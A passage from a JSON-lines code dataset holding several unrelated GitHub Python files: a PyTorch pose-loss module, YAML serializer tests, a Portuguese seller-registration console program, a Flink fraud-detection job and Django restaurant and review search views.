, 1) ).unsqueeze(1).repeat(1,3,1,1) + EPSILON\n return torch.div(normals , normals_norm)\n\n def normalize_coords(self, coords):\n coord_n = coords[:, 0:3, :, :]\n coord_u = coords[:, 3:6, :, :]\n coord_t = coords[:, 6:9, :, :]\n\n return torch.cat((self.normalize_normal(coord_n), self.normalize_normal(coord_u), self.normalize_normal(coord_t)), 1)\n\n def compute_pose_loss(self, gt_up_vector, pred_cam_geo_unit, pred_up_geo_unit, pred_weights, targets=None):\n '''\n solving poses using consraint least sqaure by solving Langrange Multipler directly\n '''\n cos_criterion = nn.CosineSimilarity(dim=0)\n\n num_pixels = pred_cam_geo_unit.size(2) * pred_cam_geo_unit.size(3)\n num_samples = pred_cam_geo_unit.size(0)\n\n identity_mat = torch.eye(3).float().cuda()\n identity_mat_rep = identity_mat.unsqueeze(0).repeat(num_samples,1,1)#, requires_grad=False)\n # zeros_mat = Variable(torch.zeros(3).float().cuda(), requires_grad=False)\n\n weights_n = pred_weights[:, 0:1, :, :].repeat(1,3,1,1)\n weights_u = pred_weights[:, 1:2, :, :].repeat(1,3,1,1)\n weights_t = pred_weights[:, 2:3, :, :].repeat(1,3,1,1)\n\n pred_cam_n = pred_cam_geo_unit[:, 0:3, :, :] \n pred_cam_u = pred_cam_geo_unit[:, 3:6, :, :]\n pred_cam_t = pred_cam_geo_unit[:, 6:9, :, :]\n\n pred_cam_n_w = pred_cam_n * weights_n\n pred_cam_u_w = pred_cam_u * weights_u\n pred_cam_t_w = pred_cam_t * weights_t\n\n pred_cam_n_w_flat = pred_cam_n_w.view(num_samples, \n pred_cam_n_w.size(1), \n num_pixels)\n pred_cam_u_w_flat = pred_cam_u_w.view(num_samples, \n pred_cam_u_w.size(1), \n num_pixels)\n pred_cam_t_w_flat = pred_cam_t_w.view(num_samples, \n pred_cam_t_w.size(1), \n num_pixels)\n\n # M * 3 x 3N matrix\n A_w = torch.cat((pred_cam_n_w_flat, \n pred_cam_u_w_flat, \n pred_cam_t_w_flat), dim=2)\n \n pred_up_geo_unit_w = pred_weights * pred_up_geo_unit\n pred_up_geo_unit_w_flat = 
pred_up_geo_unit_w.view(num_samples, \n pred_up_geo_unit.size(1), \n num_pixels)\n # M * 1 * 3N\n b_w = torch.cat((pred_up_geo_unit_w_flat[:, 0:1, :], \n pred_up_geo_unit_w_flat[:, 1:2, :], \n pred_up_geo_unit_w_flat[:, 2:3, :]), dim=2)\n\n # M*3*3\n H = torch.bmm(A_w, torch.transpose(A_w, 1, 2))\n # M*3*1\n g = torch.bmm(A_w, torch.transpose(b_w, 1, 2))\n ggT = torch.bmm(g, torch.transpose(g, 1, 2))\n\n # A0 = torch.bmm(H, H) - ggT\n # A1 = -2.0 * H\n\n # C_mat = torch.cat( (torch.cat((-A1, -A0), dim=2), torch.cat((identity_mat, zeros_mat), dim=2)), dim=1)\n C_mat = torch.cat( (torch.cat((H, -identity_mat_rep), dim=2), \n torch.cat((-ggT, H), dim=2)), dim=1)\n\n\n pose_term = 0.0\n\n for i in range(num_samples):\n\n if self.opt.backprop_eig > EPSILON:\n min_lambda = ExtractSMinEigenValue.apply(C_mat[i, :, :])\n else:\n est_lambda = torch.eig(C_mat[i, :, :])\n est_lambda = est_lambda[0]\n\n img_part = est_lambda[:, 1]\n real_part = est_lambda[:, 0]\n\n min_lambda = torch.min(real_part[torch.abs(img_part.data) < 1e-6]).item()\n\n est_up_n = torch.matmul(torch.pinverse(H[i, :, :] - min_lambda * identity_mat), \n g[i, :, :])\n\n up_diff_cos = cos_criterion(est_up_n[:, 0], \n gt_up_vector[i, :])\n\n # print('min_lambda ', min_lambda)\n # print('i %d up_diff_cos %f ang_diff %f'%(i, up_diff_cos.item(), torch.acos(torch.clamp(up_diff_cos, -1.0, 1.0)).item() * 180/math.pi))\n\n if up_diff_cos.item() < (1.0 - 1e-6):\n up_diff_angle_rad = torch.acos(up_diff_cos)\n else:\n up_diff_angle_rad = 1.0 - up_diff_cos\n \n pose_term += self.opt.w_pose * up_diff_angle_rad/float(num_samples)\n\n # print('pose_term %f'%pose_term.item())\n\n return pose_term\n \n\n def rotate_normal(self, pred_global_n_unit, pred_rot):\n num_samples = pred_global_n_unit.size(0)\n num_c = pred_global_n_unit.size(1)\n num_pixels = pred_global_n_unit.size(2) * pred_global_n_unit.size(3)\n\n pred_global_n_unit_flat = pred_global_n_unit.view(num_samples, \n num_c, \n num_pixels)\n\n pred_cam_n_unit_flat = torch.bmm(pred_rot, pred_global_n_unit_flat)\n pred_cam_n_unit = pred_cam_n_unit_flat.view(num_samples, num_c, \n pred_global_n_unit.size(2), \n pred_global_n_unit.size(3))\n\n return pred_cam_n_unit\n\n\n def __call__(self, input_images, pred_cam_geo_unit, pred_up_geo_unit, pred_weights, targets):\n gt_up_vector = Variable(targets['gt_up_vector'].cuda(), \n requires_grad=False) \n gt_rp = Variable(targets['gt_rp'].cuda(), \n requires_grad=False)\n\n gt_upright_geo = Variable(targets['upright_geo'].cuda(), \n requires_grad=False)\n gt_cam_geo = Variable(targets['cam_geo'].cuda(), \n requires_grad=False)\n \n gt_mask = Variable(targets['gt_mask'].cuda(), \n requires_grad=False)\n \n total_loss = 0.\n\n if self.opt.w_pose > EPSILON:\n pose_term = self.compute_pose_loss(gt_up_vector, \n pred_cam_geo_unit, \n pred_up_geo_unit, \n pred_weights)\n total_loss += pose_term\n else:\n pose_term = torch.tensor(0.).cuda()\n\n if self.opt.w_cam > EPSILON:\n cam_geo_term = 0.0\n for i in range(0, 3):\n cam_geo_term += self.opt.w_cam * self.compute_cos_sim_loss(gt_cam_geo[:, i*3:(i+1)*3, :, :], \n pred_cam_geo_unit[:, i*3:(i+1)*3, :, :], \n gt_mask)\n\n cam_geo_term = cam_geo_term/3.0\n print('cam_geo_term ', cam_geo_term.item())\n total_loss = total_loss + cam_geo_term\n\n if self.opt.w_grad > EPSILON:\n cam_grad_term = 0.\n for j in range(self.num_scales):\n stride = 2**j\n cam_grad_term += self.opt.w_grad * self.opt.w_cam * self.compute_normal_gradient_loss(gt_cam_geo[:, :, ::stride, ::stride], \n pred_cam_geo_unit[:, :, ::stride, ::stride], \n 
gt_mask[:, ::stride, ::stride])\n\n print('cam_grad_term ', cam_grad_term.item())\n total_loss += cam_grad_term\n\n else:\n cam_geo_term = torch.tensor(0.).cuda()\n\n if self.opt.w_up > EPSILON:\n upright_geo_term = self.opt.w_up * self.compute_cos_sim_loss(gt_upright_geo, \n pred_up_geo_unit, \n gt_mask)\n\n print('upright_geo_term ', upright_geo_term.item())\n total_loss = total_loss + upright_geo_term\n\n if self.opt.w_grad > EPSILON:\n upright_grad_term = 0.\n for j in range(self.num_scales):\n stride = 2**j\n upright_grad_term += self.opt.w_grad * self.opt.w_up * self.compute_normal_gradient_loss(gt_upright_geo[:, :, ::stride, ::stride], \n pred_up_geo_unit[:, :, ::stride, ::stride], \n gt_mask[:, ::stride, ::stride])\n\n print('upright_grad_term ', upright_grad_term.item())\n total_loss += upright_grad_term\n else:\n upright_n_term = torch.tensor(0.).cuda()\n\n\n self.total_loss = total_loss\n\n return total_loss.item(), cam_geo_term.item(), upright_geo_term.item(), pose_term.item()\n\n def get_loss_var(self):\n return self.total_loss\n\n","repo_name":"zhengqili/UprightNet","sub_path":"models/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":19097,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"72"} +{"seq_id":"19691660110","text":"import json\n\npath_data = \"data/levels-data\"\n\ndef read_lvl_data(lvl):\n \"\"\"The data is stored in the .txt file as followed: lat, lon, size\n where lat and long is the starting loc \n\n Args:\n lvl (int): the level you want to retrieve the data for\n\n Returns:\n list: [lat, lon, size]\n \"\"\"\n with open(path_data+f\"/lvl{lvl}.json\") as file:\n data = json.load(file)\n return data","repo_name":"LilianBsc/loc-and-kiss","sub_path":"loc-and-kiss/read_src.py","file_name":"read_src.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40773243725","text":"\"\"\"Tests YAML serializer\"\"\"\nimport mock\n\nfrom pymco.serializers import yaml as _yaml\n\n\ndef test_serialize(yaml, msg):\n \"\"\"Test msg serialization\"\"\"\n assert yaml.serialize(msg) == \"\"\":agent: discovery\n:body: ping\n:collective: mcollective\n:filter:\n agent: []\n cf_class: []\n compound: []\n fact: []\n identity: []\n:msgtime: 123\n:requestid: 6ef11a5053008b54c03ca934972fdfa45448439d\n:senderid: mco1\n:ttl: 60\n\"\"\"\n\n\ndef test_serialize_data(yaml, msg_with_data):\n assert yaml.serialize(msg_with_data) == \"\"\":agent: puppet\n:body:\n :action: runonce\n :data:\n :noop: true\n :process_results: true\n :ssl_msgtime: 1421878604\n :ssl_ttl: 60\n:collective: mcollective\n:filter:\n agent: []\n cf_class: []\n compound: []\n fact: []\n identity: []\n:msgtime: 123\n:requestid: 6ef11a5053008b54c03ca934972fdfa45448439d\n:senderid: mco1\n:ttl: 60\n\"\"\"\n\n\ndef test_deserialize(yaml, yaml_response):\n assert yaml.deserialize(yaml_response) == {\n ':senderid': 'mco1',\n ':requestid': '335a3e8261e4589499d366862b328816',\n ':senderagent': 'discovery',\n ':msgtime': 1384022186,\n ':body': 'pong',\n }\n\n\ndef test_symbol_constructor():\n loader, node = mock.Mock(), mock.Mock(value='foo')\n assert _yaml.symbol_constructor(loader, node) == ':foo'\n\n\ndef test_ruby_object_constructor():\n loader, node = mock.Mock(), mock.Mock()\n assert _yaml.ruby_object_constructor(\n loader, 'Puppet:Resuource', node\n ) == loader.construct_yaml_map.return_value\n 
loader.construct_yaml_map.assert_called_once_with(node)\n","repo_name":"rafaduran/python-mcollective","sub_path":"tests/unit/serializers/test_yaml.py","file_name":"test_yaml.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"72"} +{"seq_id":"33408481120","text":"vendedores = {}\ncodigos = []\nop = 9999\n\n\nwhile (op != 0):\n print('\\n--------MENU----------\\n')\n print('1 - Fazer cadastro')\n print('2 - Fazer login')\n print('0 - Sair')\n\n\n op = int(input('Digite o numero correspondente à opção desejada: '))\n\n\n if (op == 1):\n usuario_valido = False\n while usuario_valido == False:\n usuario = input('Digite seu usuario: ')\n for user in vendedores.keys():\n if user == usuario:\n print('Esse usuario já está cadastrado. Tente novamente.')\n break\n else:\n usuario_valido = True\n senha = input('Digite sua senha: ')\n nome = input('Digite seu nome completo: ')\n\n\n cpf_valido = False\n\n\n while cpf_valido == False:\n cpf = (input('Digite seu cpf: '))\n if len(cpf) == 11:\n cpf_valido = True\n if cpf_valido:\n print('CPF válido')\n else:\n print('CPF inválido, Tente novamente')\n\n\n tel = int(input('Digite seu telefone: '))\n email = input('Digite seu email: ')\n vendedores[usuario] = [senha, nome, cpf, tel, email, []]\n print('Cadastro Realizado Com Sucesso')\n break\n\n\n elif (op == 2):\n sistema = False\n while sistema == False:\n usuario = input('Digite seu usuario: ')\n senha = input('Digite sua senha: ')\n\n\n for user in vendedores:\n if (user == usuario):\n senha1 = vendedores[usuario][0]\n if (senha1 == senha):\n sistema = True\n print(f'Bem-vindo(a), {vendedores[usuario][1]}!')\n\n\n op2 = 99999\n while (op2 != 0):\n print('\\n--------LOGADO----------\\n')\n print('1 - Cadastrar novo produto para venda')\n print('2 - Buscar produtos cadastrados')\n print('3 - Remover produtos cadastrados')\n print('4 - Atualizar produtos cadastrados')\n print('5 - Atualizar senha')\n print('0- Sair')\n\n\n op2 = int(input('Digite o numero correspondente à opção desejada: '))\n\n\n if (op2 == 1):\n produtos = {}\n codigo_valido = False\n\n\n while codigo_valido == False:\n codigo = (input('Digite o código do produto: '))\n for cod in codigos:\n if cod == codigo:\n print('Já existe um produto com esse código. 
Por favor, tente novamente.')\n break\n else:\n codigo_valido = True\n\n\n nome = input('Digite o nome do produto: ')\n preco = float(input('Digite o preço do produto: '))\n quantidade = int(input('Digite a quantidade em estoque: '))\n vendedores[usuario][5].append({'nome': nome, 'codigo': codigo, 'preco': preco, 'quantidade': quantidade})\n codigos.append(codigo)\n print('Produto cadastrado com sucesso!')\n\n\n elif (op2 == 2):\n print('\\n--------BUSCAR PRODUTO CADASTRADO---------\\n')\n nome_produto = input('Digite o nome do produto: ')\n\n\n achados = False\n\n\n for produto in vendedores[usuario][5]:\n if produto['nome'].find(nome_produto) != -1:\n print('CODIGO - NOME - PREÇO - QUANTIDADE')\n print(f\"{produto['codigo']} - {produto['nome']} - {produto['preco']} - {produto['quantidade']}\")\n achados = True\n\n\n if achados == False:\n print('Produto não encontrado.')\n\n\n elif (op2 == 3):\n print('\\n------------Produtos Cadastrados------------\\n')\n print('CODIGO - NOME - PREÇO - QUANTIDADE ')\n for produto in vendedores[usuario][5]:\n print(f\"{produto['codigo']} - {produto['nome']} - {produto['preco']} - {produto['quantidade']}\")\n\n\n codigo_produto = input('digite o codigo do produto que deseja remover: ')\n produtos_vendedor = vendedores[usuario][5]\n indice_produto = -1\n\n\n for i in range(len(produtos_vendedor)):\n if produtos_vendedor[i]['codigo'] == codigo_produto:\n indice_produto = i\n break\n\n\n if indice_produto == -1:\n print('Produto não encontrado.')\n else:\n vendedores[usuario][5].remove(produtos_vendedor[indice_produto])\n codigos.remove(codigo_produto)\n print('Produto removido com sucesso!')\n\n\n elif (op2 == 4):\n print('\\n------------Produtos Cadastrados------------\\n')\n print('CODIGO - NOME - PREÇO - QUANTIDADE')\n for produto in vendedores[usuario][5]:\n print(f\"{produto['codigo']} - {produto['nome']} - {produto['preco']} - {produto['quantidade']}\")\n\n\n codigo_produto = input('digite o codigo do produto que deseja atualizar: ')\n produtos_vendedor = vendedores[usuario][5]\n indice_produto = -1\n\n\n for i in range(len(produtos_vendedor)):\n if produtos_vendedor[i]['codigo'] == codigo_produto:\n indice_produto = i\n break\n\n\n if indice_produto == -1:\n print('Produto não encontrado.')\n\n\n else:\n novo_nome = input('Digite o novo nome do produto ou pressione ENTER para manter o mesmo: ')\n if novo_nome != \"\":\n produtos_vendedor[indice_produto]['nome'] = novo_nome\n\n\n novo_preco = input('Digite o novo preco do produto ou pressione ENTER para manter o mesmo: ')\n if novo_preco != \"\":\n produtos_vendedor[indice_produto]['preco'] = float(novo_preco)\n\n\n nova_quantidade = input('Digite a nova quantidade do produto ou pressione ENTER para manter a mesma: ')\n if nova_quantidade != \"\":\n produtos_vendedor[indice_produto]['quantidade'] = int(nova_quantidade)\n print('Produto atualizado com sucesso!')\n\n\n elif (op2 == 5):\n nova_senha = input('digite a nova senha: ')\n vendedores[usuario][0] = nova_senha\n print('Senha atualizada com sucesso!')\n\n\n elif (op2 != 0):\n print('Seleçao invalida')\n\n\n else:\n print('-------DESLOGADO--------')\n\n\n else:\n print('Senha Incorreta')\n else:\n print('Usuário não encontrado')\n\n\n elif (op != 0):\n print('Seleçao invalida')\n\n\n else:\n print('Programa 
Finalizado')\n","repo_name":"samuk900/SamuelSenyeBrendaeRoselanio","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8514,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36415715508","text":"#!/usr/bin/python3\n\n# Removes a character at a specified index n\ndef remove_char_at(str, n):\n strCopy = \"\"\n for i in range(len(str)):\n if i == n:\n continue\n strCopy += str[i]\n return strCopy\n","repo_name":"chee-zaram/alx-higher_level_programming","sub_path":"0x01-python-if_else_loops_functions/101-remove_char_at.py","file_name":"101-remove_char_at.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"738630174","text":"import json\nfrom datetime import datetime\n\nimport redis2\nimport requests\nfrom pyflink.common.serialization import SimpleStringSchema\nfrom pyflink.common.typeinfo import Types\nfrom pyflink.datastream import StreamExecutionEnvironment\nfrom pyflink.datastream.connectors import FlinkKafkaConsumer, FlinkKafkaProducer\nfrom pyflink.datastream.functions import RuntimeContext, MapFunction\n\nclass FraudDetector(MapFunction):\n\tdef open(self, runtime_context: RuntimeContext):\n\t\tself.r = redis2.Redis(host=conf['redis']['host'], port=conf['redis']['port'], db=conf['redis']['db'])\n\t\tself.ctx = runtime_context.get_metrics_group()\n\t\treturn super().open(runtime_context)\n\t\n\tdef raise_fraud(self, event, metadata):\n\t\tevent[\"meta\"] = metadata\n\t\turl = conf['slack']['webhook']\n\t\theaders = {'Content-Type': 'application/json'}\n\t\tpayload = {\n\t\t\t\"text\": \":warning: *Fraud Transaction Alert*\\n> Transaction ID: `{id}`\\n> Severity: `{severity}`\\n> Description: `{desc}`\".format(\n\t\t\t\tid=event[\"txn_id\"],\\\n\t\t\t\tseverity=event[\"meta\"][\"severity\"],\n\t\t\t\tdesc=event[\"meta\"][\"description\"]\n\t\t\t)\n\t\t}\n\t\tresponse = requests.post(\n\t\t\turl=url, \n\t\t\theaders=headers,\n\t\t\tjson=payload\n\t\t)\n\t\tself.ctx.add_group(\n\t\t\t\"dataset_id\", conf[\"kafka\"][\"source_topic\"]\n\t\t).add_group(\n\t\t\t\"txn_type\", \"fraud_txn\"\n\t\t).add_group(\n\t\t\t\"txn_id\",event[\"txn_id\"]\n\t\t).counter(\"txn_count\").inc(1)\n\t\tupdatedValue = json.dumps(event, separators=(',', ':'))\n\t\treturn updatedValue\n\n\n\tdef map(self, value):\n\t\tevent = json.loads(value)\n\t\tredis_data = self.r.get(event['sender_account_number'])\n\t\tif redis_data is None:\n\t\t\tmetadata = {\n\t\t\t\t\"fraud_processed\": \"False\", \n\t\t\t\t\"isFraud\": \"False\",\n\t\t\t\t\"description\": \"Profile not found\"\n\t\t\t}\n\t\t\tevent[\"meta\"] = metadata\n\t\t\tupdatedValue = json.dumps(event, separators=(',', ':'))\n\t\t\treturn updatedValue\n\t\telse:\n\t\t\tfraud_profile = json.loads(redis_data)\n\t\t\t# DT like rules:\n\t\t\ttry:\n\t\t\t\t# if receiver account is not active\n\t\t\t\tif event[\"receiver_account_details\"][\"account_status\"] != \"ACTIVE\":\n\t\t\t\t\tmetadata = {\n\t\t\t\t\t\t\"fraud_processed\": \"True\", \n\t\t\t\t\t\t\"isFraud\": \"True\",\n\t\t\t\t\t\t\"severity\": \"Severe\",\n\t\t\t\t\t\t\"description\": \"Receiver is a suspected mule account.\"\n\t\t\t\t\t}\n\t\t\t\t\treturn self.raise_fraud(event, metadata)\n\t\t\t\t# If txn amount is higher than the net spend across 3 months\n\t\t\t\telif event[\"txn_amount\"] >= fraud_profile[\"net_amount_spent\"]:\n\t\t\t\t\tlatest_txn_date = 
datetime.fromisoformat(fraud_profile[\"latest_txn_date\"])\n\t\t\t\t\tif (datetime.now(latest_txn_date.tzinfo) - latest_txn_date).days > 20:\n\t\t\t\t\t\tmetadata = {\n\t\t\t\t\t\t\t\"fraud_processed\": \"True\", \n\t\t\t\t\t\t\t\"isFraud\": \"True\",\n\t\t\t\t\t\t\t\"severity\": \"Severe\",\n\t\t\t\t\t\t\t\"description\": \"High spend from an dormant amount.\"\n\t\t\t\t\t\t}\n\t\t\t\t\t\treturn self.raise_fraud(event, metadata)\n\t\t\t\t\telse:\n\t\t\t\t\t\tmetadata = {\n\t\t\t\t\t\t\t\"fraud_processed\": \"True\", \n\t\t\t\t\t\t\t\"isFraud\": \"True\",\n\t\t\t\t\t\t\t\"severity\": \"Severe\",\n\t\t\t\t\t\t\t\"description\": \"Transaction amount higher than net spend.\"\n\t\t\t\t\t\t}\n\t\t\t\t\t\treturn self.raise_fraud(event, metadata)\n\t\t\t\t# if txn amount is higher than 3 std dev of daily avg amount\n\t\t\t\telif event[\"txn_amount\"] >= ((3 * fraud_profile[\"std_dev_net_amount_spent\"]) + fraud_profile[\"daily_avg_amount_spent\"]):\n\t\t\t\t\tmetadata = {\n\t\t\t\t\t\t\"fraud_processed\": \"True\", \n\t\t\t\t\t\t\"isFraud\": \"True\",\n\t\t\t\t\t\t\"severity\": \"Medium\",\n\t\t\t\t\t\t\"description\": \"Transaction amount considerably higher than daily average spend.\"\n\t\t\t\t\t}\n\t\t\t\t\treturn self.raise_fraud(event, metadata)\n\t\t\t\t# If daily avg cashflow is close to 0\n\t\t\t\telif (fraud_profile[\"daily_avg_cashflow\"] < 100000) and (fraud_profile[\"daily_avg_cashflow\"] > -100000):\n\t\t\t\t\tmetadata = {\n\t\t\t\t\t\t\"fraud_processed\": \"True\", \n\t\t\t\t\t\t\"isFraud\": \"True\",\n\t\t\t\t\t\t\"severity\": \"Medium\",\n\t\t\t\t\t\t\"description\": \"High transactions yet low cashflow.\"\n\t\t\t\t\t}\n\t\t\t\t\treturn self.raise_fraud(event, metadata)\n\t\t\t\t# If daily avg transaction count is high\n\t\t\t\telif fraud_profile[\"daily_avg_transactions\"] > 1:\n\t\t\t\t\tmetadata = {\n\t\t\t\t\t\t\"fraud_processed\": \"True\", \n\t\t\t\t\t\t\"isFraud\": \"True\",\n\t\t\t\t\t\t\"severity\": \"Low\",\n\t\t\t\t\t\t\"description\": \"High daily avg transactions.\"\n\t\t\t\t\t}\n\t\t\t\t\treturn self.raise_fraud(event, metadata)\n\t\t\texcept KeyError:\n\t\t\t\tmetadata = {\n\t\t\t\t\t\"fraud_processed\": \"False\", \n\t\t\t\t\t\"isFraud\": \"False\",\n\t\t\t\t\t\"description\": \"metric unavailable.\"\n\t\t\t\t}\n\t\t\t\tevent[\"meta\"] = metadata\n\t\t\t\tupdatedValue = json.dumps(event, separators=(',', ':'))\n\t\t\t\treturn updatedValue\n\t\t\texcept TypeError:\n\t\t\t\tmetadata = {\n\t\t\t\t\t\"fraud_processed\": \"False\", \n\t\t\t\t\t\"isFraud\": \"False\",\n\t\t\t\t\t\"description\": \"metric unavailable.\"\n\t\t\t\t}\n\t\t\t\tevent[\"meta\"] = metadata\n\t\t\t\tupdatedValue = json.dumps(event, separators=(',', ':'))\n\t\t\t\treturn updatedValue\n\t\t# None of rules satisifed, hence not a fraud\n\t\t\telse:\n\t\t\t\tmetadata = {\n\t\t\t\t\t\"fraud_processed\": \"True\", \n\t\t\t\t\t\"isFraud\": \"False\"\n\t\t\t\t}\n\t\t\t\tevent[\"meta\"] = metadata\n\t\t\t\tupdatedValue = json.dumps(event, separators=(',', ':'))\n\t\t\t\treturn updatedValue\n\n\n\tdef close(self):\n\t\treturn super().close()\n\n\nif __name__ == '__main__':\n\tconf = {\n\t\t\"slack\": {\n\t\t\t\"webhook\": \"\"\n\t\t},\n\t\t\"kafka\": {\n\t\t\t\"brokers\": \"obsrv-kafka-headless.kafka.svc.cluster.local:9092\",\n\t\t\t\"source_topic\": \"\",\n\t\t\t\"sink_topic\": \"-out\"\n\t\t},\n\t\t\"redis\": {\n\t\t\t\"host\": \"obsrv-redis-master.redis.svc.cluster.local\",\n\t\t\t\"port\": 6379,\n\t\t\t\"db\": 3\n\t\t}\n\t}\n\n\t# with open(\"/tmp/conf.json\", \"r\") as f:\n\t# \tconf = 
json.load(f)\n\tenv = StreamExecutionEnvironment.get_execution_environment()\n\tdeserialization_schema = SimpleStringSchema()\n\tserialization_schema = SimpleStringSchema() \n\tkafka_consumer = FlinkKafkaConsumer(\n\t topics=conf['kafka']['source_topic'],\n\t deserialization_schema=deserialization_schema,\n\t properties={'bootstrap.servers': conf['kafka']['brokers'], 'group.id': 'processor_python_group', 'auto.offset.reset': 'earliest'})\n\tkafka_sink = FlinkKafkaProducer(\n topic=conf['kafka']['sink_topic'],\n serialization_schema=serialization_schema,\n producer_config={'bootstrap.servers': conf['kafka']['brokers'], 'group.id': 'producer_group'})\n\tds = env.add_source(kafka_consumer)\n\tds.map(FraudDetector(), output_type=Types.STRING()).add_sink(kafka_sink)\n\tenv.execute('fraud-detector')\n","repo_name":"Sanketika-Obsrv/obsrv-adhoc-scripts","sub_path":"fraud_detection/flink/src/fraud_detector.py","file_name":"fraud_detector.py","file_ext":"py","file_size_in_byte":6037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20574520712","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Business, Review, Profile\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import ReviewForm\nfrom django.contrib import messages\nfrom gensim import corpora, models, similarities\nimport jieba\n\ndef search(request):\n request_type = request.POST.get(\"search_method\")\n content = request.POST.get(\"request_content\")\n if request.method == 'POST':\n if request_type == '1':\n business_list = Business.objects.filter(name__contains = content).order_by('-avg_rating')\n elif request_type == '2':\n business_list = Business.objects.filter(popular_dishes__contains = content).order_by('-avg_rating')\n else:\n business_list = Business.objects.filter(address__contains = content).order_by('-avg_rating')\n\n return render(request, 'display.html', {'businesses':business_list, })\n\n\n\ndef review_search(request):\n dictionary = corpora.Dictionary.load('review.dictionary')\n #corpus = corpora.MmCorpus('review.mm')\n lsi = models.LsiModel.load('review.lsi')\n print(lsi.num_topics)\n index = similarities.Similarity.load('review.index')\n\n query_txt = request.POST.get('review')\n query_string = \",\".join(jieba.cut_for_search(query_txt))\n query_words = query_string.split(\",\")\n print(query_words)\n query = dictionary.doc2bow(query_words)\n print(query)\n query_lsi = lsi[query]\n print(query_lsi)\n\n sims = index[query_lsi]\n result_list = sorted(enumerate(sims), key=lambda item: -item[1])\n result_list = result_list[0:20]\n print(result_list)\n review_list = []\n for result in result_list:\n try:\n result_review = Review.objects.get(file_num=int(result[0]))\n except:\n continue\n\n review_list.append(result_review)\n\n return render(request, 'display_review.html', {'reviews':review_list, })\n\ndef review_search_key_word(request):\n content = request.POST.get('keyword')\n review_list = Review.objects.filter(content__contains = content)\n\n return render(request, 'display_review.html', {'reviews':review_list, })\n\ndef search_region(shop_list, region, dish_style):\n dic = { '朝阳区':['建外大街', '大望路', '朝外大街', '朝阳公园/团结湖', '左家庄',\n '亮马桥/三元桥', '亚运村', '望京', '劲松/潘家园', '安贞', '芍药居',\n '国贸', '双井', '三里屯', '对外经贸', '酒仙桥', '管庄', '首都机场',\n '十八里店', '北苑家园', '十里堡', '东坝', '孙河', '马泉营', '定福庄',\n '四惠', '太阳宫', '青年路', '石佛营', '甜水园', '慈云寺','八里庄', '工人体育场',\n '百子湾', '传媒大学','二外', '双桥', '北京欢乐谷', '高碑店', '北京东站',\n '霄云路', '蓝色港湾', '燕莎','农业展览馆', 
'姚家园', '十里河', '立水桥',\n '小营', '北沙滩', '大屯', '小庄/红庙', '常营', '798/大山子', '草房',\n '游娱联盟壹号基地'], \n '东城区':['王府井/东单', '建国门/北京站', '东四', '安定门', '朝阳门', '东直门', '广渠门',\n '左安门', '沙子口', '前门', '崇文门', '天坛', '地安门', '和平里', '东四十条', '雍和宫/地坛',\n '南锣鼓巷/鼓楼东大街', '北新桥/簋街', '光明楼/龙潭湖', '沙滩/美术馆灯市口'], \n '西城区':['西单', '复兴门', '阜成门', '西直门/动物园', '新街口', '地安门', '前门', '牛街', '虎坊桥',\n '菜市口', '广内大街', '广外大街', '宣武门', '右安门', '西四', '月坛', '什刹海', '德外大街',\n '陶然亭', '南菜园','白纸坊'],\n '海淀区':['中关村', '五道口', '魏公村', '北太平庄', '苏州桥', '北下关', '公主坟/万寿路', '紫竹桥',\n '航天桥', '上地', '颐和园', '田村', '双榆树', '五棵松', '清河', '远大路', '香山', '大钟寺',\n '知春路', '西三旗', '四季青', '人民大学', '万柳', '学院桥', '军博', '农业大学西区'], \n '丰台区':['方庄', '六里桥/丽泽桥', '洋桥/木樨园', '宋家庄', '右安门', '北大地', '刘家窑', '青塔',\n '开阳里', '草桥', '看丹桥', '花乡', '大红门', '公益西桥', '云岗', '卢沟桥', '北京西站/六里桥',\n '分钟寺','成寿寺', '夏家胡同/纪家庙', '马家堡','角门', '马家堡','角门', '总部基地', '石榴庄',\n '槐房万达广场'], \n '石景山区':['苹果园', '古城','八角', '鲁谷', '模式口'],\n '大兴区':['亦庄', '旧宫', '黄村', '西红门'],\n '通州区':['宋庄', '西集', '物资学院', '果园', '梨园', '新华大街', '九棵树', '通州北苑', '武夷花园', '马驹桥',\n '次渠'], \n '昌平区':['回龙观', '天通苑', '昌平镇', '小汤山', '南口镇', '北七家', '沙河'], \n '房山区':['长阳镇', '城关镇', '窦店镇', '阎村镇', '燕山', '河北镇', '十渡镇', '青龙湖镇', '良乡'], \n '顺义区':['后沙峪', '马坡牛栏山', '南彩', '石园', '首都机场', '国展', '顺义'], \n '怀柔区':['商业街', '京北大世界', '斜街', '下园', '东关', '富乐大街', '庙城', '桥梓镇', '雁栖开发区',\n '渤海镇/慕田峪长城'], \n '延庆区':['八达岭镇', '大榆树镇', '大庄科乡', '井庄镇', '旧县镇', '康庄镇', '刘斌堡乡', '千家店镇', '沈家营镇',\n '四海镇', '香营乡', '延庆镇', '永宁镇', '张山营镇', '珍珠泉乡'], \n '密云区':['北庄镇', '不老屯镇', '大城子镇', '东邵渠镇', '冯家峪镇', '高岭镇', '古北口镇', '河南寨镇',\n '巨各庄镇', '经济开发区', '密云镇', '穆家峪镇', '十里堡镇', '石城镇', '太师屯镇', '西田各庄镇',\n '溪翁庄镇', '新城子镇']\n }\n enum_list = dic[region]\n #result = Business.objects.none()\n result = []\n for subregion in enum_list:\n temp_list = Business.objects.filter(region__contains = subregion).order_by('-avg_rating')\n if dish_style != '全部':\n temp_list = temp_list.filter(category__contains = dish_style).order_by('-avg_rating')\n for b in temp_list:\n result.append(b)\n\n return result\n\n\ndef multi_search(request):\n dish_style = request.POST.get(\"dish_style\")\n region = request.POST.get(\"region\")\n subregion = request.POST.get(\"subregion\")\n shop_list = Business.objects.all()\n\n if dish_style == None:\n dish_style = '全部'\n if region == None:\n region = '全市'\n if subregion == None:\n subregion = '全区'\n\n if 